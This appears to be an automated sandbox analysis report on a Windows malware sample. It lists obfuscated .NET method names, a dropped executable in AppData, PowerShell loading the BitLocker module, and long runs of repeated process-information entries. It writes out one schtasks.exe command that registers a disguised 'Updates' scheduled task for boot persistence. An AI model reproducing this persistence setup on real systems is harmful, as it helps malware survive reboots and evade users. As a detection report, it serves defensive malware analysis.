Source: 0.2.file.exe.46088a8.0.raw.unpack, RWJAdZO605P7Pfy0v0.cs	High entropy of concatenated method names: 'Dispose', 'cQXVJ496TG', 'llWCDbTNol', 'bIZ3Or0xMq', 'LBNVeKjc4P', 'aseVznj8Tl', 'ProcessDialogKey', 'VZCCQywhar', 'Y6oCVPibi1', 'lTbCCtTFtQ'
Source: 0.2.file.exe.46088a8.0.raw.unpack, tLJ6REfsBF1vqsDoyy.cs	High entropy of concatenated method names: 'AExktFjU8W', 'Hork7QGvGt', 'qaMkAKTYAf', 'XvskqVP0Xw', 'z9HkPjsHRy', 'zU5kjsgKNw', 'EKLkceQ1D9', 'eTNkhVTEkZ', 'kcgJucABScjML2ZCIiC', 'r0W3gGAHW1JYv5fLjHO'
Source: 0.2.file.exe.46088a8.0.raw.unpack, Q62oGbu8DV9rX5wJwd.cs	High entropy of concatenated method names: 'Pjdi7tOphl', 'Usli1DDVQu', 'JXaiA9Eebc', 'wdoiqYsfVA', 'lwniZd5P3o', 'sNwiPjoJ74', 'xSCijRatka', 'BJkiv8crfX', 'dnficb9DRP', 'gjPihK6Lxb'
Source: 0.2.file.exe.46088a8.0.raw.unpack, coA3DmVVBh3UctpBAZG.cs	High entropy of concatenated method names: 'AWFUeZ5N7S', 'B0TUzPGJDH', 'sET9Q5fxQC', 'LVX9VcVMyZ', 'orx9CMwgH6', 'rCj96bLb8Q', 'NRc9XvmQIM', 'pYA9s77m7l', 'TLv9oZlvTX', 'Eol9OK3Ok0'
Source: 0.2.file.exe.46088a8.0.raw.unpack, cywharJe6oPibi1HTb.cs	High entropy of concatenated method names: 'IbUYgCPqbl', 'AVaYDxPutv', 'mkWYpeSfi9', 'rp5Yfq882l', 'fAlYbGZTL3', 'u58YBQNMh5', 'HZrYrjXUyy', 'jKLY2NcV3i', 'biyYuFWivw', 'MLXYERPcas'
Source: 0.2.file.exe.46088a8.0.raw.unpack, sHfKkN54chF6WiE6AV.cs	High entropy of concatenated method names: 'iibavwvfP8', 'MEracCPRMX', 'nmYagAauS5', 'wfjaDH9c1n', 'kHZafvqCGo', 'nOgab4SMv1', 'jwAarUJYoR', 'Yn8a2NELIw', 'UJpaE0wXmu', 'ukoaxoSaZi'
Source: 0.2.file.exe.46088a8.0.raw.unpack, uXSXE7We5t716HfqRh.cs	High entropy of concatenated method names: 's6wTEVbnib', 'zdpTLikBlu', 'MmoTW93vKN', 'D4fT0TXHdG', 'uJ4TDFo4k4', 'VlJTpSluni', 'yPCTfsBngw', 'OkpTbgK7qX', 'KKKTBYZWhR', 'ceVTrVyJ1o'
Source: 0.2.file.exe.46088a8.0.raw.unpack, K2MnvBrrgKX79LA4tT.cs	High entropy of concatenated method names: 'sClio613M3', 'M09iwFDByy', 'PmfikKdhnZ', 'vSXkef0Mym', 'FCqkzHXLL0', 'XpMiQC0DGy', 'ThWiVTFmOB', 'Yl0iC9ZoBq', 'iuJi62OIOu', 'mhViXwJVqX'
Source: 0.2.file.exe.46088a8.0.raw.unpack, ONOLBgBydLdq850M1Z.cs	High entropy of concatenated method names: 'BVAky117qV', 'w6KknZbhbZ', 'jIbkN3VUYF', 'ToString', 'rCrklH2F8U', 'aSvkIP7j72', 'mvF0tXAT6CGtdhoFvcm', 'bTsJhmAWlIfbdquiOHo', 'vcLT0gAVkWebfu8RTDH'
Source: 0.2.file.exe.46088a8.0.raw.unpack, puUTeqC8kQWsB490u6.cs	High entropy of concatenated method names: 'tyWALv4NJ', 'vKuqqcH8i', 'H0pP0CIWY', 'WC1jYWeqB', 'FyAcFMa8D', 'tfqhnMn9T', 'LetgGc3WX2BMXek9Aj', 'SQCOLCkeOyUdiJv4IW', 'gwIMdhml6', 'IjhU5MH14'
Source: 0.2.file.exe.46088a8.0.raw.unpack, wTFtQOefwxCNemYGj4.cs	High entropy of concatenated method names: 'TlfUw8srGt', 'SxRU3N0kDb', 'GqgUkxvExF', 'CTDUihixgu', 'HhcUYgWw93', 'dmcU4M069U', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.file.exe.46088a8.0.raw.unpack, keQPg2cRy4RSdjuplZ.cs	High entropy of concatenated method names: 'c4fwq2uVBB', 'kOlwPPiypE', 'sm4wvgETFW', 'Ys6wcTMTIG', 'CmiwTrJY6e', 'whuwF2vcZS', 'RaPwGCWWSM', 'EfdwMjMdvY', 'JnRwYHf4Kp', 'KjtwUqoATP'
Source: 0.2.file.exe.46088a8.0.raw.unpack, p9L4P9VQd2EFVir3ApF.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'DjwUxcqGAi', 'nbAULwjC5S', 'RLiU5BJCL9', 'kUrUWp1jTY', 'Y7XU0bQaog', 'GhHUy5wihC', 'BiQUnYlQJP'
Source: 0.2.file.exe.46088a8.0.raw.unpack, TWi20shrpy2ST84bbc.cs	High entropy of concatenated method names: 'Njx3ZGyldT', 'o8E3jaslAm', 'BMvwpVZyeC', 'umswfik1qY', 'dChwbCWsi5', 'MPZwBX72NQ', 'S3ZwrDKdcE', 'zGtw2kXOho', 'ID0wuQpv7K', 'wW0wEVbW3p'
Source: 0.2.file.exe.46088a8.0.raw.unpack, Q9Q3O3v9UFqGC0o5Zy.cs	High entropy of concatenated method names: 'GebOWTqSXT', 'mDCO0H66tp', 'L9HOyIb0Cl', 'ey5OnGOJNW', 'ovEONYKgsF', 'RHsOlJAdBP', 'E2VOIp8cMS', 'uKHOmyNvT3', 'tmjOJ4DTv3', 'F8XOeAoBeV'
Source: 0.2.file.exe.46088a8.0.raw.unpack, H5x4KkgyxELWQJgB7k.cs	High entropy of concatenated method names: 'SBBksrm21H', 'KpDkOM2lUI', 'caDk3WDYOW', 'BcXki0J6Op', 'Plyk4K6wFh', 'CWm3NDDOCe', 'mvy3lEV2rY', 'O1a3IwSE39', 'TO53mLBQdb', 'EQq3Ji1iQy'
Source: 0.2.file.exe.46088a8.0.raw.unpack, SrUj34VC106CvAQ5XE8.cs	High entropy of concatenated method names: 'ToString', 'AIp9vBxRBp', 'Wa39cj2RL2', 'C8X9hXV1Wx', 'YK69gPn27k', 'ud09DwLZpl', 'f0N9pOGu3v', 'S2q9f7HZ9Z', 'M0InVKOyNtow6ZnY6Ul', 'jqJE6cOdpqUJh1W4HpM'

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Roaming\djqdPdQRO.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\djqdPdQRO" /XML "C:\Users\user\AppData\Local\Temp\tmp8017.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
